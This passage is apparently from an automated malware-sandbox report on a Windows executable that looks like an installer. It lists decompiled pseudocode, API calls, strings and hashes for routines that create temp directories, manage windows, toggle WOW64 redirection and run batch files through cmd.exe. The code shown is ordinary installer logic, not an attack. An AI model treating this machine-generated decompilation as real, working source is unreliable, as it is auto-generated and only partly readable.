					_push(0);
					_push(0);
					_t88 = _t88 - 1;
				} while (_t88 != 0);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_push(_t118);
				_push(0x47b2e7);
				_push( *[fs:eax]);
				 *[fs:eax] = _t119;
				E00452D84( &_v20, __ebx, __edx, __edi, __esi); // executed
				E00403450(0x49b120, _t87, _v20, _t115, _t116);
				E00403494( &_v20, "Created temporary directory: ");
				_t100 =  *0x49b120; // 0x22900c8
				E0040357C( &_v20, _t100);
				E00456B58(_v20, _t87, _t88, _t115, _t116);
				if( *0x49afac != 0) {
					_t85 =  *0x49b120; // 0x22900c8
					E0045634C(_t85);
				}
				_t46 =  *0x49b120; // 0x22900c8
				E0042C3E4(_t46,  &_v20);
				E004035C0( &_v8, "_isetup", _v20);
				_t52 = CreateDirectoryA(E00403738(_v8), 0); // executed
				_t122 = _t52;
				if(_t52 == 0) {
					_t87 = GetLastError();
					_t11 =  &_v36; // 0x496e25
					E004507B8(0x2f, _t11, _v8);
					_t13 =  &_v36; // 0x496e25
					_v32 =  *_t13;
					E00406D48(_t70,  &_v40);
					_v28 = _v40;
					E0042E714(_t87,  &_v44);
					_v24 = _v44;
					E00450788(0x60, 2,  &_v32,  &_v20);
					E00408BEC(_v20, 1);
					E0040311C();
				}
				E004035C0( &_v16, "\\_RegDLL.tmp", _v8);
				E0047B11C("REGDLL_EXE", _t87, _v16, _t115, _t116, _t122); // executed
				E00457780( &_v12);
				_t123 = _v12;
				if(_v12 != 0) {
					E004035C0( &_v16, "\\_setup64.tmp", _v8);
					E0047B11C(_v12, _t87, _v16, _t115, _t116, _t123); // executed
					E004577EC(_v16);
				}
				_pop(_t105);
				 *[fs:eax] = _t105;
				_push(E0047B2EE);
				E00403420( &_v44, 3);
				return E00403420( &_v20, 4);
			}

0x0047b174
0x0047b174
0x0047b174
0x0047b175
0x0047b177
0x0047b17c
0x0047b17c
0x0047b17e
0x0047b180
0x0047b180
0x0047b183
0x0047b184
0x0047b185
0x0047b188
0x0047b189
0x0047b18e
0x0047b191
0x0047b197
0x0047b1a4
0x0047b1b1
0x0047b1b9
0x0047b1bf
0x0047b1c7
0x0047b1d3
0x0047b1d5
0x0047b1da
0x0047b1da
0x0047b1e2
0x0047b1e7
0x0047b1f7
0x0047b207
0x0047b20c
0x0047b20e
0x0047b215
0x0047b21b
0x0047b223
0x0047b228
0x0047b22b
0x0047b233
0x0047b23b
0x0047b243
0x0047b24b
0x0047b258
0x0047b267
0x0047b26c
0x0047b26c
0x0047b27c
0x0047b289
0x0047b291
0x0047b296
0x0047b29a
0x0047b2a7
0x0047b2b2
0x0047b2ba
0x0047b2ba
0x0047b2c1
0x0047b2c4
0x0047b2c7
0x0047b2d4
0x0047b2e6

APIs

CreateDirectoryA.KERNEL32(00000000,00000000,00000000,0047B2E7,?,?,00000000,0049A628,00000000,00000000,?,00496835,00000000,004969DE,?,00000000), ref: 0047B207
GetLastError.KERNEL32(00000000,00000000,00000000,0047B2E7,?,?,00000000,0049A628,00000000,00000000,?,00496835,00000000,004969DE,?,00000000), ref: 0047B210

Strings

REGDLL_EXE, xrefs: 0047B284
%nI, xrefs: 0047B21B, 0047B228
\_RegDLL.tmp, xrefs: 0047B274
_isetup, xrefs: 0047B1F2
Created temporary directory: , xrefs: 0047B1A9
\_setup64.tmp, xrefs: 0047B29F

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID: %nI$Created temporary directory: $REGDLL_EXE$\_RegDLL.tmp$\_setup64.tmp$_isetup
API String ID: 1375471231-710936655
Opcode ID: 3619a39d7fda8914c3d06cdfec5e17a5147e1e8152a4e0ed72c1458c84847c5a
Instruction ID: ded73d098ab4dab0e3cdb8880457fd2625b5a67b96b2fecb6f849cb42c7586f3
Opcode Fuzzy Hash: 3619a39d7fda8914c3d06cdfec5e17a5147e1e8152a4e0ed72c1458c84847c5a
Instruction Fuzzy Hash: 78412974A0020D9BCB01EF95D856ADEB7B9EF48305F50857BE81077392DB38AE05CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0042F1B8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 90
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 70%

			E0042F1B8(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				void* _t10;
				intOrPtr _t17;
				struct HINSTANCE__* _t22;
				struct HWND__* _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t26;
				struct HWND__* _t30;
				void* _t38;
				intOrPtr _t40;
				void* _t43;
				struct HWND__* _t45;
				struct HWND__* _t46;
				intOrPtr _t48;
				intOrPtr _t49;

				_t44 = __esi;
				_t38 = __edx;
				_t48 = _t49;
				_push(0);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				if(__edx != 0) {
					_t49 = _t49 + 0xfffffff0;
					_t10 = E00402D30(_t10, _t48);
				}
				_t43 = _t10;
				_push(_t48);
				_push(0x42f2c7);
				_push( *[fs:eax]);
				 *[fs:eax] = _t49;
				E00402B30(0);
				 *((intOrPtr*)(_t43 + 0xc)) = GetActiveWindow();
				 *((intOrPtr*)(_t43 + 0x10)) = GetFocus();
				_t17 = E0041EE8C(0, _t38, _t43, _t44); // executed
				 *((intOrPtr*)(_t43 + 0x14)) = _t17;
				if( *0x49a68e == 0) {
					 *0x49a68e = RegisterClassA(0x4987ac);
				}
				if( *0x49a68e != 0) {
					_t22 =  *0x49a014; // 0x400000
					_t23 = CreateWindowExA(0, "TWindowDisabler-Window", 0x42f2e4, 0x88000000, 0, 0, 0, 0, 0, 0, _t22, 0); // executed
					_t45 = _t23;
					 *(_t43 + 8) = _t45;
					if(_t45 != 0) {
						_t24 =  *0x49a014; // 0x400000
						_t5 = _t43 + 8; // 0x61736944
						_t26 =  *0x49a628; // 0x2262410
						E00424264(_t26,  &_v8);
						_t30 = CreateWindowExA(0, "TWindowDisabler-Window", E00403738(_v8), 0x80000000, 0, 0, 0, 0,  *_t5, 0, _t24, 0); // executed
						_t46 = _t30;
						 *(_t43 + 4) = _t46;
						if(_t46 != 0) {
							ShowWindow(_t46, 8); // executed
						}
					}
				}
				SetFocus(0);
				_pop(_t40);
				 *[fs:eax] = _t40;
				_push(E0042F2CE);
				return E00403400( &_v8);
			}

0x0042f1b8
0x0042f1b8
0x0042f1b9
0x0042f1bb
0x0042f1bd
0x0042f1be
0x0042f1bf
0x0042f1c2
0x0042f1c4
0x0042f1c7
0x0042f1c7
0x0042f1ce
0x0042f1d2
0x0042f1d3
0x0042f1d8
0x0042f1db
0x0042f1e2
0x0042f1ec
0x0042f1f4
0x0042f1f9
0x0042f1fe
0x0042f209
0x0042f215
0x0042f215
0x0042f223
0x0042f22b
0x0042f24e
0x0042f253
0x0042f255
0x0042f25a
0x0042f25e
0x0042f266
0x0042f27a
0x0042f27f
0x0042f294
0x0042f299
0x0042f29b
0x0042f2a0
0x0042f2a5
0x0042f2a5
0x0042f2a0
0x0042f25a
0x0042f2ac
0x0042f2b3
0x0042f2b6
0x0042f2b9
0x0042f2c6

APIs

GetActiveWindow.USER32 ref: 0042F1E7
GetFocus.USER32(00000000,0042F2C7,?,?,?,00000001,00000000,?,004576A2,00000000,0049A628), ref: 0042F1EF
RegisterClassA.USER32 ref: 0042F210
CreateWindowExA.USER32 ref: 0042F24E
CreateWindowExA.USER32 ref: 0042F294
ShowWindow.USER32(00000000,00000008,00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000,00000000,TWindowDisabler-Window), ref: 0042F2A5
SetFocus.USER32(00000000,00000000,0042F2C7,?,?,?,00000001,00000000,?,004576A2,00000000,0049A628), ref: 0042F2AC

Strings

TWindowDisabler-Window, xrefs: 0042F247, 0042F28D

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Window$CreateFocus$ActiveClassRegisterShow
String ID: TWindowDisabler-Window
API String ID: 3167913817-1824977358
Opcode ID: ffe2ffd30b4a5f750cb555bc04aad1cb884832cfea774a24078151c1f469c623
Instruction ID: f4f81eae499b84a337a61a59bddcd6ba639cb96b2e333524252cf2adc60773cb
Opcode Fuzzy Hash: ffe2ffd30b4a5f750cb555bc04aad1cb884832cfea774a24078151c1f469c623
Instruction Fuzzy Hash: 0021A174780710FAE210EB65DC03F1A76A8EB05B04FA1417BF540AB2D1DABDAD14C6EE

Uniqueness

Uniqueness Score: -1.00%

Function 00452550 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 46
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 53%

			E00452550(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				char _v8;
				char _t8;
				intOrPtr _t22;
				intOrPtr _t27;

				_t16 = __ebx;
				_push(0);
				_push(__ebx);
				_push(_t27);
				_push(0x4525e9);
				_push( *[fs:eax]);
				 *[fs:eax] = _t27;
				 *0x49af94 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "Wow64DisableWow64FsRedirection");
				 *0x49af98 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "Wow64RevertWow64FsRedirection");
				if( *0x49af94 == 0 ||  *0x49af98 == 0) {
					_t8 = 0;
				} else {
					_t8 = 1;
				}
				 *0x49af9c = _t8;
				E0042E294("shell32.dll", _t16, 0x8000); // executed
				E0042E714(0x4c783afb,  &_v8);
				_pop(_t22);
				 *[fs:eax] = _t22;
				_push(E004525F0);
				return E00403400( &_v8);
			}

0x00452550
0x00452553
0x00452555
0x0045255a
0x0045255b
0x00452560
0x00452563
0x0045257b
0x00452595
0x004525a1
0x004525ac
0x004525b0
0x004525b0
0x004525b0
0x004525b2
0x004525c1
0x004525ce
0x004525d5
0x004525d8
0x004525db
0x004525e8

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004525E9,?,?,?,?,00000000,?,00496EFD), ref: 00452570
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00452576
GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004525E9,?,?,?,?,00000000,?,00496EFD), ref: 0045258A
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00452590

Strings

Wow64RevertWow64FsRedirection, xrefs: 00452580
shell32.dll, xrefs: 004525BC
kernel32.dll, xrefs: 0045256B, 00452585
Wow64DisableWow64FsRedirection, xrefs: 00452566

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
API String ID: 1646373207-2130885113
Opcode ID: e18cd7cb1d092ea3be367e08a53de1b363d9d423846078c0c97ce3a6de157d78
Instruction ID: 5ea4ccb5783b51a00fe515fa9b09f0943108d713fb5d55adfa6b5f385c998aa6
Opcode Fuzzy Hash: e18cd7cb1d092ea3be367e08a53de1b363d9d423846078c0c97ce3a6de157d78
Instruction Fuzzy Hash: 8B01ACB0201704FED702EB729E13B163A58E75671AF604437F80066183E6FC5908DDBE

Uniqueness

Uniqueness Score: -1.00%

Function 00466504 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 141
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 74%

			E00466504(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				int _v8;
				char _v348;
				int _v356;
				struct _SHFILEINFO _v360;
				char _v364;
				int _t62;
				int _t77;
				void* _t80;
				intOrPtr _t86;
				char* _t91;
				void* _t92;
				void* _t93;
				void* _t97;
				void* _t98;
				intOrPtr _t114;
				intOrPtr _t115;
				void* _t131;
				void* _t132;
				intOrPtr _t133;

				_t129 = __esi;
				_t128 = __edi;
				_t131 = _t132;
				_t133 = _t132 + 0xfffffe98;
				_push(__esi);
				_push(__edi);
				_v364 = 0;
				_v8 = 0;
				_push(_t131);
				_push(0x4666f6);
				_push( *[fs:eax]);
				 *[fs:eax] = _t133;
				E00414604( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x2e0)), 0x20);
				E00414624( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x2e0)), 0x20);
				E00414604( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x2e4)), 0x20);
				E00414624( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x2e4)), 0x20);
				_push(_t131);
				_push(0x4666cb);
				_push( *[fs:eax]);
				 *[fs:eax] = _t133;
				_t62 = SHGetFileInfo("c:\\directory", 0x10,  &_v360, 0x160, 0x1010); // executed
				if(_t62 != 0 && _v348 != 0) {
					_t97 =  *0x49a014; // 0x400000
					_t98 = ExtractIconA(_t97,  &_v348, _v356); // executed
					E00466444(_t98,  *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x2e0)), __edi);
				}
				if(E00477524(6, 0) == 0) {
					E0047B964(0, 2, _t128, _t129, __eflags,  &_v8);
					__eflags = _v8;
					if(_v8 == 0) {
						__eflags = 0;
						E0047B964(1, 2, _t128, _t129, 0,  &_v8);
					}
					__eflags = _v8;
					if(_v8 != 0) {
						_t77 = SHGetFileInfo(E00403738(_v8), 0,  &_v360, 0x160, 0x1000);
						__eflags = _t77;
						if(_t77 != 0) {
							__eflags = _v348;
							if(_v348 != 0) {
								_t80 =  *0x49a014; // 0x400000
								E00466444(ExtractIconA(_t80,  &_v348, _v356),  *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x2e4)), _t128);
							}
						}
					}
				} else {
					_t86 =  *0x49b128; // 0x228ff14
					E0042C3E4(_t86,  &_v364);
					E0040357C( &_v364, "shell32.dll");
					_t91 = E00403738(_v364);
					_t92 =  *0x49a014; // 0x400000
					_t93 = ExtractIconA(_t92, _t91, 0x27); // executed
					E00466444(_t93,  *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x2e4)), _t128);
				}
				_pop(_t114);
				 *[fs:eax] = _t114;
				_pop(_t115);
				 *[fs:eax] = _t115;
				_push(E004666FD);
				E00403400( &_v364);
				return E00403400( &_v8);
			}

0x00466504
0x00466504
0x00466505
0x00466507
0x0046650e
0x0046650f
0x00466512
0x00466518
0x0046651d
0x0046651e
0x00466523
0x00466526
0x0046653a
0x00466550
0x00466566
0x0046657c
0x00466583
0x00466584
0x00466589
0x0046658c
0x004665a7
0x004665ae
0x004665c7
0x004665cd
0x004665de
0x004665de
0x004665ee
0x00466649
0x0046664e
0x00466652
0x00466658
0x0046665e
0x0046665e
0x00466663
0x00466667
0x00466685
0x0046668a
0x0046668c
0x0046668e
0x00466695
0x004666a5
0x004666bc
0x004666bc
0x00466695
0x0046668c
0x004665f0
0x004665f8
0x004665fd
0x0046660d
0x00466618
0x0046661e
0x00466624
0x00466635
0x00466635
0x004666c3
0x004666c6
0x004666d7
0x004666da
0x004666dd
0x004666e8
0x004666f5

APIs

SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 004665A7
ExtractIconA.SHELL32(00400000,00000000,?), ref: 004665CD

Part of subcall function 00466444: DrawIconEx.USER32 ref: 004664DC
Part of subcall function 00466444: DestroyCursor.USER32(00000000), ref: 004664F2

ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 00466624
SHGetFileInfo.SHELL32(00000000,00000000,?,00000160,00001000), ref: 00466685
ExtractIconA.SHELL32(00400000,00000000,?), ref: 004666AB

Strings

shell32.dll, xrefs: 00466608
c:\directory, xrefs: 004665A2

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Icon$Extract$FileInfo$CursorDestroyDraw
String ID: c:\directory$shell32.dll
API String ID: 3376378930-1375355148
Opcode ID: 6b95454be9c61405fb8ccbed1c3933e5c9392edd6600f71802376583cb1798b1
Instruction ID: db26cb531e6b14f407810b20cd0d515ef24d000dd8986a1aa395d033f7d2f398
Opcode Fuzzy Hash: 6b95454be9c61405fb8ccbed1c3933e5c9392edd6600f71802376583cb1798b1
Instruction Fuzzy Hash: 7F516EB0600248AFDB20DF55DD8AFDBB7E8EB48304F5141B7F90897351DA399E81CA59

Uniqueness

Uniqueness Score: -1.00%

Function 00430598 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 23
registryclipboardthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00430598() {
				char _v4;
				long _v8;
				char _v12;
				char _v16;
				char _v48;
				char _t9;
				short _t13;

				 *0x49a690 = RegisterClipboardFormatA("commdlg_help");
				 *0x49a694 = RegisterClipboardFormatA("commdlg_FindReplace");
				_t9 =  *0x49a014; // 0x400000
				_v16 = _t9;
				_v12 = 0;
				_v8 = GetCurrentThreadId();
				_v4 = 0;
				_t13 = GlobalAddAtomA(E004078A0( &_v48,  &_v16, "WndProcPtr%.8X%.8X", 1)); // executed
				 *0x4987f0 = _t13;
				return _t13;
			}

0x004305a5
0x004305b4
0x004305bb
0x004305c0
0x004305c4
0x004305ce
0x004305d2
0x004305ea
0x004305ef
0x004305f8

APIs

RegisterClipboardFormatA.USER32 ref: 004305A0
RegisterClipboardFormatA.USER32 ref: 004305AF
GetCurrentThreadId.KERNEL32 ref: 004305C9
GlobalAddAtomA.KERNEL32 ref: 004305EA

Strings

commdlg_help, xrefs: 0043059B
commdlg_FindReplace, xrefs: 004305AA
WndProcPtr%.8X%.8X, xrefs: 004305DB

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: ClipboardFormatRegister$AtomCurrentGlobalThread
String ID: WndProcPtr%.8X%.8X$commdlg_FindReplace$commdlg_help
API String ID: 4130936913-2943970505
Opcode ID: 8ee73fdb1fe827424ccf1e94ffddc580aaa2b1737a99f9e00092c58a7ff271e7
Instruction ID: f059336bb748b0bf38c669d149687d19fef2dbcbecef34365b6a0a8e4ef37772
Opcode Fuzzy Hash: 8ee73fdb1fe827424ccf1e94ffddc580aaa2b1737a99f9e00092c58a7ff271e7
Instruction Fuzzy Hash: 1DF082B04483409AE300EF25C8027197BE4AB98308F44463FF498A62E1E73E9510CB5F

Uniqueness

Uniqueness Score: -1.00%

Function 0045422C Relevance: 12.2, APIs: 2, Strings: 6, Instructions: 154
COMMON

Download Yara Rule

C-Code - Quality: 52%

			E0045422C(char __eax, void* __ebx, char __ecx, void* __edx, void* __edi, void* __esi, intOrPtr* _a4, void* _a8, short _a12, intOrPtr _a16, char _a20) {
				char _v5;
				char _v12;
				short _v32;
				intOrPtr _v36;
				char _v80;
				void* _v92;
				char _v96;
				char _v100;
				char _v104;
				intOrPtr _t59;
				void* _t69;
				signed int _t75;
				char _t105;
				intOrPtr _t125;
				void* _t135;
				intOrPtr* _t137;
				void* _t140;

				_t109 = __ecx;
				_v100 = 0;
				_v104 = 0;
				_v12 = 0;
				_t105 = __ecx;
				_t135 = __edx;
				_v5 = __eax;
				_t137 = _a4;
				E00403728(_a20);
				_push(_t140);
				_push(0x454422);
				_push( *[fs:eax]);
				 *[fs:eax] = _t140 + 0xffffff9c;
				E00403684(_t135, 0x45443c);
				if(0 != 0) {
					_push(0x454448);
					_push(_t135);
					_push(0x454448);
					E00403634();
					__eflags = _t105;
					if(__eflags != 0) {
						_push(_v12);
						_push(0x454454);
						_push(_t105);
						E00403634();
					}
					E0042C8A0(_t135, _t109,  &_v100, __eflags);
					__eflags = E00406AA4(_v100, 0x454460);
					if(__eflags == 0) {
						L6:
						_t59 = E0042DAF4(_t58);
						__eflags = _t59;
						if(_t59 == 0) {
							_push(0x454448);
							E0042D83C( &_v104);
							E0042C3E4(_v104,  &_v100);
							_push(_v100);
							_push("COMMAND.COM\" /C ");
							_push(_v12);
							E00403634();
						} else {
							_push(0x454448);
							E0042D868( &_v104);
							E0042C3E4(_v104,  &_v100);
							_push(_v100);
							_push("cmd.exe\" /C \"");
							_push(_v12);
							_push(0x454448);
							E00403634();
						}
						goto L9;
					} else {
						E0042C8A0(_t135, _t109,  &_v100, __eflags);
						_t58 = E00406AA4(_v100, 0x454470);
						__eflags = _t58;
						if(_t58 != 0) {
							L9:
							__eflags = _a20;
							if(_a20 == 0) {
								E0042C848(_t135, _t109,  &_a20);
							}
							goto L11;
						}
						goto L6;
					}
				} else {
					E00403494( &_v12, _t105);
					L11:
					_t29 =  &_v80; // 0x477146
					E00402934(_t29, 0x44);
					_v80 = 0x44;
					_v36 = 1;
					_v32 = _a12;
					_t143 = _a20;
					if(_a20 == 0) {
						E0042D868( &_a20);
					}
					_t69 = E00403738(_a20);
					_t75 = E00451B48(_v5, E00403738(_v12), 0, _t143,  &_v96,  &_v80, _t69, 0, 0x4000000, 0, 0, 0); // executed
					asm("sbb ebx, ebx");
					_t108 =  ~( ~_t75);
					if( ~( ~_t75) != 0) {
						CloseHandle(_v92);
						E00454198(_v96, _t108, _a16, _t135, _t137, _t137); // executed
					} else {
						 *_t137 = GetLastError();
					}
					_pop(_t125);
					 *[fs:eax] = _t125;
					_push(E00454429);
					E00403420( &_v104, 2);
					E00403400( &_v12);
					return E00403400( &_a20);
				}
			}

0x0045422c
0x00454237
0x0045423a
0x0045423d
0x00454240
0x00454242
0x00454244
0x00454247
0x0045424d
0x00454254
0x00454255
0x0045425a
0x0045425d
0x00454267
0x0045426c
0x0045427d
0x00454282
0x00454283
0x00454290
0x00454295
0x00454297
0x00454299
0x0045429c
0x004542a1
0x004542aa
0x004542aa
0x004542b4
0x004542c6
0x004542c8
0x004542e5
0x004542e5
0x004542ea
0x004542ec
0x00454325
0x0045432d
0x00454338
0x0045433d
0x00454340
0x00454345
0x00454350
0x004542ee
0x004542ee
0x004542f6
0x00454301
0x00454306
0x00454309
0x0045430e
0x00454311
0x0045431e
0x0045431e
0x00000000
0x004542ca
0x004542cf
0x004542dc
0x004542e1
0x004542e3
0x00454355
0x00454355
0x00454359
0x00454360
0x00454360
0x00000000
0x00454359
0x00000000
0x004542e3
0x0045426e
0x00454273
0x00454365
0x00454365
0x0045436f
0x00454374
0x0045437b
0x00454386
0x0045438a
0x0045438e
0x00454393
0x00454393
0x004543a8
0x004543c5
0x004543ce
0x004543d0
0x004543d4
0x004543e3
0x004543f2
0x004543d6
0x004543db
0x004543db
0x004543f9
0x004543fc
0x004543ff
0x0045440c
0x00454414
0x00454421
0x00454421

APIs

GetLastError.KERNEL32(?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,00454448,00454448,?,00454448,00000000), ref: 004543D6
CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,00454448,00454448,?,00454448), ref: 004543E3

Part of subcall function 00454198: WaitForInputIdle.USER32 ref: 004541C4
Part of subcall function 00454198: MsgWaitForMultipleObjects.USER32 ref: 004541E6
Part of subcall function 00454198: GetExitCodeProcess.KERNEL32 ref: 004541F5
Part of subcall function 00454198: CloseHandle.KERNEL32(?,00454222,0045421B,?,?,?,00000000,?,?,004543F7,?,?,?,00000044,00000000,00000000), ref: 00454215

Strings

COMMAND.COM" /C , xrefs: 00454340
.cmd, xrefs: 004542D7
FqG, xrefs: 00454365, 00454374
.bat, xrefs: 004542BC
cmd.exe" /C ", xrefs: 00454309
FqG, xrefs: 004543AE

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CloseHandleWait$CodeErrorExitIdleInputLastMultipleObjectsProcess
String ID: .bat$.cmd$COMMAND.COM" /C $FqG$FqG$cmd.exe" /C "
API String ID: 854858120-200444573
Opcode ID: a79fc61136a56f68c9fa57edad7eb931dbb836afb08e7db108499debf35d9c77
Instruction ID: d1ba8077eb5a089916e8a4371357b0499bb0f263c7e834c27fe6988169414fdd
Opcode Fuzzy Hash: a79fc61136a56f68c9fa57edad7eb931dbb836afb08e7db108499debf35d9c77
Instruction Fuzzy Hash: BD514A34B403499BCB11EF95C841BDDBBB9AF8530DF50443BBC04AB292D77C99498759

Uniqueness

Uniqueness Score: -1.00%

Function 00423674 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 96
windowCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00423674(void* __ecx, char __edx, void* __edi) {
				char _v5;
				char _v261;
				void* __esi;
				void* __ebp;
				int _t29;
				struct HINSTANCE__* _t40;
				intOrPtr _t44;
				struct HINSTANCE__* _t46;
				void* _t52;
				char* _t54;
				int _t65;
				void* _t66;
				char _t68;
				void* _t78;
				void* _t80;
				void* _t81;

				_t78 = __edi;
				_t68 = __edx;
				_t66 = __ecx;
				if(__edx != 0) {
					_t81 = _t81 + 0xfffffff0;
					_t29 = E00402D30(_t29, _t80);
				}
				_v5 = _t68;
				_t65 = _t29;
				E00410208(_t66, 0);
				 *((intOrPtr*)(_t65 + 0x70)) = E00402B30(1);
				 *((intOrPtr*)(_t65 + 0x80)) = E00402B30(1);
				 *((intOrPtr*)(_t65 + 0x40)) = 0;
				 *((intOrPtr*)(_t65 + 0x60)) = 0;
				 *((intOrPtr*)(_t65 + 0x3c)) = 0x80000018;
				 *((intOrPtr*)(_t65 + 0x54)) = 0x1f4;
				 *((intOrPtr*)(_t65 + 0x58)) = 0x32;
				 *((intOrPtr*)(_t65 + 0x5c)) = 0x9c4;
				 *((char*)(_t65 + 0x64)) = 0;
				 *((char*)(_t65 + 0x7d)) = 1;
				_t79 = E0041D9FC(1);
				 *((intOrPtr*)(_t65 + 0x78)) = _t39;
				_t40 =  *0x49a014; // 0x400000
				E0041DD88(_t79, LoadIconA(_t40, "MAINICON"));
				_t13 = _t65 + 0x78; // 0xc23bc88b
				_t44 =  *_t13;
				 *((intOrPtr*)(_t44 + 8)) = _t65;
				 *((intOrPtr*)(_t44 + 4)) = 0x424a8c;
